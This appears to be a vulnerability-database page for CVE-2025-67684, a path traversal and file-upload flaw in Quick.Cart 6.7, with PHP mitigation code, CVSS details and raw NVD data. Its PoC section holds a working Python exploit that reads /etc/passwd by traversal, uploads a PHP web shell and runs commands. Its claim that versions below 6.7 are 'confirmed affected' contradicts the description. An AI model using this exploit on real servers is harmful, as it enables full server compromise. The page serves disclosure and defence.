Security Vulnerability Report
CVE-2025-67684 CVSS 7.2 HIGH

CVE-2025-67684

Published: 2026-01-22 12:15:55
Last Modified: 2026-02-19 18:33:16

Description

Quick.Cart is vulnerable to Local File Inclusion and Path Traversal issues in the theme selection mechanism. Quick.Cart allows a privileged user to upload arbitrary file contents while only validating the filename extension. This allows an attacker to include and execute uploaded PHP code, resulting in Remote Code Execution on the server. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.
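The description names two weaknesses: a theme name taken from the request and used in a file include without confining it to the themes directory, and an upload routine that trusts the client-supplied extension. The PHP below is an added illustration of the corresponding mitigations written for this page; it is not Quick.Cart's code, and the function names, the `themes` directory, the `change` parameter shown in the usage comment, and the allowed-type map are assumptions.

```php
<?php
// Added example, not Quick.Cart code. Names and paths are assumptions.
declare(strict_types=1);

/**
 * Resolve a user-supplied theme name to a directory under $themesRoot.
 * Returns the canonical path, or null if the value is not an installed theme.
 * The allowlist is the set of directories that actually exist under the root,
 * so traversal sequences such as "../../etc" can never reach include().
 */
function resolveTheme(string $themesRoot, string $requested): ?string
{
    // Only plain directory names are even considered.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }
    $root = realpath($themesRoot);
    if ($root === false) {
        return null;
    }
    // Build the allowlist from what is installed (a static list from config works too).
    $installed = array_filter(scandir($root), function (string $d) use ($root): bool {
        return $d !== '.' && $d !== '..' && is_dir($root . DIRECTORY_SEPARATOR . $d);
    });
    if (!in_array($requested, $installed, true)) {
        return null;
    }
    // Canonicalise and confirm the result still sits inside the themes root.
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Validate an uploaded file by the bytes that arrived, not only by the extension
 * the client chose. $allowed maps extension => expected MIME type.
 * Returns an error message, or null when the file is acceptable.
 */
function validateUpload(array $file, array $allowed): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload failed';
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return 'extension not allowed';
    }
    // Sniff the real content type of the temporary file.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if ($detected !== $allowed[$ext]) {
        return "content type {$detected} does not match .{$ext}";
    }
    // Coarse extra check: refuse content carrying a PHP open tag whatever the extension.
    $head = file_get_contents($file['tmp_name'], false, null, 0, 65536);
    if ($head !== false && stripos($head, '<?php') !== false) {
        return 'file contains PHP code';
    }
    return null;
}

// Usage sketch (hypothetical request parameters and paths):
// $theme = resolveTheme(__DIR__ . '/themes', $_GET['change'] ?? 'default');
// if ($theme === null) { http_response_code(400); exit; }
// require $theme . '/index.php';
//
// $err = validateUpload($_FILES['file'], ['png' => 'image/png', 'jpg' => 'image/jpeg']);
// if ($err !== null) { http_response_code(400); exit($err); }
// $ext  = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
// $dest = $storeOutsideWebroot . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
// move_uploaded_file($_FILES['file']['tmp_name'], $dest);
```

The content check is a backstop, not the main defence: uploads should land in a directory the web server will not execute scripts from, under a server-generated name, so that even a file that slips past type detection is never reachable as PHP.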

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cart:6.7:*:*:*:*:*:*:* - VULNERABLE
Quick.Cart < 6.7 (confirmed affected)
Quick.Cart 6.7 (confirmed affected)
Other Quick.Cart versions (possibly affected, untested)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-67684 PoC - Quick.Cart LFI/RCE
# Target: Quick.Cart with vulnerable theme selection mechanism

TARGET_URL = "http://target.com/quick-cart"
USERNAME = "admin"
PASSWORD = "admin123"


def exploit_lfi():
    """
    Step 1: Exploit Local File Inclusion via theme selection
    The theme parameter is vulnerable to path traversal
    """
    lfi_payload = "../../../../../../etc/passwd"
    lfi_url = f"{TARGET_URL}/?p=theme&change={lfi_payload}"
    print("[*] Testing LFI via theme parameter...")
    response = requests.get(lfi_url)
    if "root:" in response.text or "/bin/bash" in response.text:
        print("[+] LFI confirmed - /etc/passwd leaked")
        return True
    return False


def upload_shell():
    """
    Step 2: Upload malicious PHP shell
    File upload only validates extension (.php allowed)
    """
    shell_content = "<?php system($_GET['cmd']); ?>"
    shell_filename = "shell.php"
    upload_url = f"{TARGET_URL}/admin.php?p=files&action=upload"
    files = {'file': (shell_filename, shell_content, 'application/x-httpd-php')}
    data = {'username': USERNAME, 'password': PASSWORD}
    print("[*] Uploading malicious PHP shell...")
    response = requests.post(upload_url, files=files, data=data)
    if "success" in response.text.lower():
        print("[+] Shell uploaded successfully")
        return f"{TARGET_URL}/uploads/shell.php"
    return None


def execute_rce(shell_url, cmd):
    """
    Step 3: Execute arbitrary commands via uploaded shell
    """
    rce_url = f"{shell_url}?cmd={cmd}"
    response = requests.get(rce_url)
    return response.text


if __name__ == "__main__":
    print("[*] CVE-2025-67684 Quick.Cart LFI/RCE Exploit")
    # Test LFI
    if exploit_lfi():
        print("[+] LFI vulnerability confirmed")
    # Upload and execute shell
    shell_url = upload_shell()
    if shell_url:
        print(f"[*] Shell location: {shell_url}")
        result = execute_rce(shell_url, "whoami")
        print(f"[+] Command output: {result}")

References

https://cert.pl/posts/2026/01/CVE-2025-67683 (Third Party Advisory)
https://opensolution.org/sklep-internetowy-quick-cart.html (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67684", "sourceIdentifier": "[email protected]", "published": "2026-01-22T12:15:55.417", "lastModified": "2026-02-19T18:33:15.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quick.Cart is vulnerable to Local File Inclusion and Path Traversal issues in the theme selection mechanism. Quick.Cart allows a privileged user to upload arbitrary file contents while only validating the filename extension. This allows an attacker to include and execute uploaded PHP code, resulting in Remote Code Execution on the server.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}, {"lang": "es", "value": "Quick.Cart es vulnerable a problemas de inclusión local de ficheros y salto de ruta en el mecanismo de selección de temas. Quick.Cart permite a un usuario privilegiado subir contenido de ficheros arbitrario mientras solo valida la extensión del nombre de fichero. Esto permite a un atacante incluir y ejecutar código PHP subido, lo que resulta en ejecución remota de código en el servidor.\n\nEl proveedor fue notificado con antelación sobre esta vulnerabilidad, pero no respondió con los detalles de la vulnerabilidad o el rango de versiones vulnerables. Solo la versión 6.7 fue probada y confirmada como vulnerable, otras versiones no fueron probadas y también podrían ser vulnerables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cart:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "0544991D-06F2-4207-BAA0-5045BC483E61"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/01/CVE-2025-67683", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/sklep-internetowy-quick-cart.html", "source": "[email protected]", "tags": ["Product"]}]}}